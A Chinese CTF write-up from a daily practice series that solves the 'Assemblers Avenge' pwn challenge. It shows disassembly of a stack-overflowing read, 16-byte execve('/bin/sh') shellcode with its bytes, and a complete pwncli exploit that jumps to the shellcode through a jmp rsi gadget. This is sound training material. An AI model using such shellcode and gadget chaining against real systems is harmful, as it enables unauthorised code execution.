前言
该题目是 shellcode 的编写练习
每日一题计划:督促自己练习,每日分享一题的练习!想一起刷题咱们可以一起练练练,以及,相互监督!
今天是第9天,今天做强网,一个也做不出来(悲伤
题目情况
Amidst the harrowing conflict, our city bore the brunt of relentless onslaughts, witnessing widespread devastation that spared little, ravaging both infrastructure and spirit alike. Now, as the dust settles and the echoes of chaos fade, a clarion call emerges: assemble a force to restore justice and herald a new era of tranquility. With the remnants of our past preserved within this binary, embark on your mission to reclaim our future.
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: No PIE (0x400000)
Stack: Executable
RWX: Has RWX segments
Stripped: No
保护全关,疑似shellcode题
逆向分析
就这么几个函数:
.text:0000000000401000 ; Attributes: noreturn bp-based frame
.text:0000000000401000
.text:0000000000401000 ; void __fastcall __noreturn start(int, void *, size_t)
.text:0000000000401000 public _start
.text:0000000000401000 _start proc near ; DATA XREF: LOAD:0000000000400018↑o
.text:0000000000401000 ; LOAD:0000000000400088↑o
.text:0000000000401000 push rbp
.text:0000000000401001 mov rbp, rsp
.text:0000000000401004 sub rsp, 20h
.text:0000000000401008 call _write
.text:000000000040100D call _read
.text:0000000000401012 call _exit
.text:0000000000401012 _start endp
.text:0000000000401012
.text:0000000000401017
.text:0000000000401017 ; =============== S U B R O U T I N E =======================================
.text:0000000000401017
.text:0000000000401017 ; Attributes: bp-based frame
.text:0000000000401017
.text:0000000000401017 ; ssize_t write(int fd, const void *buf, size_t n)
.text:0000000000401017 _write proc near ; CODE XREF: _start+8↑p
.text:0000000000401017 push rbp
.text:0000000000401018 mov rbp, rsp
.text:000000000040101B sub rsp, 20h
.text:000000000040101F mov rax, 1
.text:0000000000401026 mov rdi, 1 ; fd
.text:000000000040102D lea rsi, message ; "~~ When you stare into the abyss, the a"...
.text:0000000000401035 mov rdx, 62h ; 'b' ; count
.text:000000000040103C syscall ; LINUX - sys_write
.text:000000000040103E leave
.text:000000000040103F retn
.text:000000000040103F _write endp
.text:000000000040103F
.text:0000000000401040
.text:0000000000401040 ; =============== S U B R O U T I N E =======================================
.text:0000000000401040
.text:0000000000401040 ; Attributes: noreturn
.text:0000000000401040
.text:0000000000401040 ; void __noreturn exit(int status)
.text:0000000000401040 _exit proc near ; CODE XREF: _start+12↑p
.text:0000000000401040 mov rax, 1
.text:0000000000401047 mov rdi, 1 ; fd
.text:000000000040104E lea rsi, goodbye ; "\n~~ Farewell ~~\n"
.text:0000000000401056 mov rdx, 11h ; count
.text:000000000040105D syscall ; LINUX - sys_write
.text:000000000040105F mov rax, 3Ch ; '<'
.text:0000000000401066 xor rdi, rdi ; error_code
.text:0000000000401069 syscall ; LINUX - sys_exit
.text:000000000040106B jmp rsi
.text:000000000040106B _exit endp
.text:000000000040106B
.text:000000000040106D
.text:000000000040106D ; =============== S U B R O U T I N E =======================================
.text:000000000040106D
.text:000000000040106D ; Attributes: bp-based frame
.text:000000000040106D
.text:000000000040106D ; ssize_t read(int fd, void *buf, size_t nbytes)
.text:000000000040106D _read proc near ; CODE XREF: _start+D↑p
.text:000000000040106D
.text:000000000040106D buf = byte ptr -8
.text:000000000040106D
.text:000000000040106D push rbp
.text:000000000040106E mov rbp, rsp
.text:0000000000401071 sub rsp, 10h
.text:0000000000401075 mov rdi, 0 ; fd
.text:000000000040107C lea rsi, [rbp+buf] ; buf
.text:0000000000401080 mov rdx, 18h ; count
.text:0000000000401087 mov rax, 0
.text:000000000040108E syscall ; LINUX - sys_read
.text:0000000000401090 leave
.text:0000000000401091 retn
.text:0000000000401091 _read endp
.text:0000000000401091
.text:0000000000401091 _text ends
其中_read函数存在栈溢出
利用分析
当前状况分析:
- 程序栈可执行,
- 存在栈溢出,只能溢出16字节刚好覆盖rbp和返回地址
- 提供了jmp rsi的gadget,且rsi就是输入的内容
如果输入shellcode的话,需要16字节以内完成执行,不然就得想办法扩大写入内容
但是程序提供了字符串可以用:
.data:000000000040204F db 0Ah
.data:0000000000402050 db 'Your only savior is: /bin/sh',0
.data:000000000040206D ; char goodbye[]
.data:000000000040206D goodbye db 0Ah
手写shellcode编译提取:
Assemblers Avenge ➤ ./get_shellcode_raw.sh
shellcode.s: Assembler messages:
shellcode.s: Warning: end of file not at end of a line; newline inserted
00000000 48 c7 c7 65 20 40 00 31 d2 31 f6 6a 3b 58 0f 05 |H..e @.1.1.j;X..|
00000010
./get_shellcode_raw.sh: line 4: : command not found
shellcode_elf: file format elf64-x86-64
Disassembly of section .text:
0000000000401000 <_start>:
401000: 48 c7 c7 65 20 40 00 mov rdi,0x402065
401007: 31 d2 xor edx,edx
401009: 31 f6 xor esi,esi
40100b: 6a 3b push 0x3b
40100d: 58 pop rax
40100e: 0f 05 syscall
发现刚好满足16字节要求,直接提交即可
完整exp
#!/usr/bin/env python3
from pwncli import *
cli_script()
io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc
with open("shellcode_raw", "rb") as f:
sc = f.read()
jmp_rsi = 0x000000000040106b
payload = sc + pack(jmp_rsi)
s(payload)
ia()
总结
shellcode题,手写shellcode